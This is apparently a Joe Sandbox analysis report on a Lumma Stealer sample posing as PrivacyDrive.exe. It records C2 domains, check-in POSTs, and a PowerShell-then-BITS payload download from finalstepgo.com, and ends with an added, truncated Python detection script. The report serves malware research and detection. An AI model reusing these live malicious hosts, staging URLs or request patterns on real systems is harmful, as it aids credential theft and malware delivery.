    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_0120F8FA
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_011FDB75
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_011F6B80
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_011F0BAC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]8_2_01202BC9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_01202BC9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202BC9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebp, word ptr [edi]8_2_0120EA30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_011F0A01
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, 0000000Bh8_2_01203AB3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]8_2_011DDAB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_011E5ADF
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]8_2_011D5D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_011FED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_011FED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_01219C10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh8_2_011FBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh8_2_011FBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_011F8C90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]8_2_011D4CB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h8_2_011EDCC2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_011E0F0F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h8_2_011EAF50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]8_2_011E3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_01217E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh8_2_01217E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx8_2_011EDE33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx8_2_011E3EA6

    Networking

    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49745 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.4:50546 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49749 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 172.67.206.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 172.67.206.221:443
    Source: Malware configuration extractorURLs: abortinoiwiam.shop
    Source: Malware configuration extractorURLs: deallyharvenw.shop
    Source: Malware configuration extractorURLs: defenddsouneuw.shop
    Source: Malware configuration extractorURLs: pumpkinkwquo.shop
    Source: Malware configuration extractorURLs: covvercilverow.shop
    Source: Malware configuration extractorURLs: surroundeocw.shop
    Source: Malware configuration extractorURLs: priooozekw.shop
    Source: Malware configuration extractorURLs: candleduseiwo.shop
    Source: Malware configuration extractorURLs: racedsuitreow.shop
    Source: Joe Sandbox ViewIP Address: 185.255.122.133 185.255.122.133
    Source: Joe Sandbox ViewIP Address: 172.67.206.221 172.67.206.221
    Source: Joe Sandbox ViewASN Name: ICMESE ICMESE
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: racedsuitreow.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMTUser-Agent: Microsoft BITS/7.8Host: finalstepgo.com
    Source: global trafficDNS traffic detected: DNS query: finalstepgo.com
    Source: global trafficDNS traffic detected: DNS query: candleduseiwo.shop
    Source: global trafficDNS traffic detected: DNS query: racedsuitreow.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: svchost.exe, 00000003.00000002.2896624234.0000024B0900D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
    Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B09218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B0924D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.3.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ocsp.thawte.com0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://s.symcd.com06
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://t2.symcb.com0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://tl.symcd.com0&
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: Amcache.hve.12.dr | String found in binary or memory: http://upx.sf.net
    Source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr | String found in binary or memory: http://www.privacy-drive.comx
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://d.symcb.com/cps0%
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0.
    Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://finalstepgo.com/
    Source: svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://finalstepgo.com/a
    Source: svchost.exe, 00000003.00000002.2896185836.0000024B04302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895863314.0000024B03A5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1825018991.0000024B08F61000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | String found in binary or memory: https://finalstepgo.com/uploads/il222.zip
    Source: svchost.exe, 00000003.00000002.2896857883.0000024B090DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://finalstepgo.com/uploads/il222.zipK
    Source: svchost.exe, 00000003.00000002.2896766529.0000024B0905B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://finalstepgo.com:443/uploads/il222.zip
    Source: svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://finalstepgo.com:443/uploads/il222.zipe
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
    Source: PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/
    Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001722000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1933666752.000000000171F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/)e3
    Source: PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/3
    Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/P
    Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923428960.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/api
    Source: PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/apiJV&
    Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/apiU.h
    Source: PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/apiV
    Source: PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028967735.00000000015F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/apie
    Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop/apisP
    Source: PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://racedsuitreow.shop:443/api
    Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923320011.0000000001718000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-ma
    Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001610000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://www.cybertronsoft.com
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://www.thawte.com/cps0
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://www.thawte.com/cps0/
    Source: PrivacyDrive.exe.2.dr | String found in binary or memory: https://www.thawte.com/repository0W
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknown | HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00424260 OpenClipboard,GetClipboardData,CloseClipboard
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00422070 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState
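    The HTTP entries above show two separate behaviours worth detecting on their own. The stealer's check-in is a POST to /api on racedsuitreow.shop, form-urlencoded, with a hard-coded Chrome 119 User-Agent, an 8-byte body on the first request and 49 bytes plus a __cf_mw_byp cookie on the later ones. The staging chain on finalstepgo.com is a GET for il2.txt carrying the User-Agent that PowerShell's Invoke-WebRequest sends by default, followed by il222.zip fetched by the BITS client (the "Powershell uses Background Intelligent Transfer Service" signature). The Python below is an added example, not part of the Joe Sandbox report: it parses raw request heads, applies a per-request rule for each behaviour and a session rule for the PowerShell-then-BITS chain. The sample requests are constructed from this page's entries with header boundaries restored; the benign request, the rule names and the treatment of __cf_mw_byp purely as an indicator (its meaning is not interpreted) are mine.

    ```python
    """Network-layer detection for the LummaC traffic entries in this report.

    Added example, not part of the Joe Sandbox report. Sample requests are
    constructed from the page's entries; the benign one is invented.
    """
    import re
    from dataclasses import dataclass, field


    @dataclass
    class HttpRequest:
        method: str
        path: str
        host: str
        headers: dict = field(default_factory=dict)


    def parse_request(raw: str) -> HttpRequest:
        """Parse a raw HTTP/1.1 request head (request line plus headers)."""
        lines = [l for l in raw.strip().splitlines() if l.strip()]
        method, path, _version = lines[0].split()
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        return HttpRequest(method, path, headers.get("host", ""), headers)


    # Browser User-Agent the stealer hard-codes on every POST in the report.
    CHROME_UA = re.compile(
        r"^Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\) AppleWebKit/537\.36 "
        r"\(KHTML, like Gecko\) Chrome/\d+\.0\.0\.0 Safari/537\.36$")


    def classify(req: HttpRequest) -> list:
        """Return the names of the indicators a single request matches."""
        hits = []
        ua = req.headers.get("user-agent", "")
        ctype = req.headers.get("content-type", "")
        clen = int(req.headers.get("content-length", "0") or 0)
        # Check-in shape: POST /api, form-urlencoded, browser UA, tiny body.
        if (req.method == "POST" and req.path == "/api"
                and ctype.startswith("application/x-www-form-urlencoded")
                and CHROME_UA.match(ua)):
            hits.append("lumma_c2_post_api")
            if clen == 8:  # the first beacon in the report is exactly 8 bytes
                hits.append("lumma_c2_beacon_8_bytes")
        # Cookie present on the 49-byte POSTs but not on the 8-byte one.
        if "__cf_mw_byp=" in req.headers.get("cookie", ""):
            hits.append("lumma_cf_mw_byp_cookie")
        # Download cradle: Invoke-WebRequest's default UA fetching a file.
        if req.method == "GET" and "WindowsPowerShell/" in ua:
            hits.append("powershell_download")
        # BITS client pulling an archive or binary.
        if ua.startswith("Microsoft BITS/") and req.path.lower().endswith((".zip", ".exe", ".dll")):
            hits.append("bits_download_binary")
        return hits


    def correlate(requests: list) -> list:
        """Session rule: a PowerShell GET followed by a BITS GET to the same host."""
        ps_hosts, findings = set(), []
        for req in requests:
            ua = req.headers.get("user-agent", "")
            if "WindowsPowerShell/" in ua:
                ps_hosts.add(req.host)
            elif ua.startswith("Microsoft BITS/") and req.host in ps_hosts:
                findings.append(("powershell_bits_cradle", req.host, req.path))
        return findings


    def network_iocs(requests: list) -> set:
        """Hosts contacted by any request that tripped at least one rule."""
        return {r.host for r in requests if classify(r)}


    # Constructed samples; header sets follow the report's entries one for one.
    BEACON = """POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: racedsuitreow.shop
    """
    BEACON_WITH_COOKIE = """POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 49
    Host: racedsuitreow.shop
    """
    PS_CRADLE = """GET /uploads/il2.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: finalstepgo.com
    Connection: Keep-Alive
    """
    BITS_FETCH = """GET /uploads/il222.zip HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMT
    User-Agent: Microsoft BITS/7.8
    Host: finalstepgo.com
    """
    BENIGN = """GET /index.html HTTP/1.1
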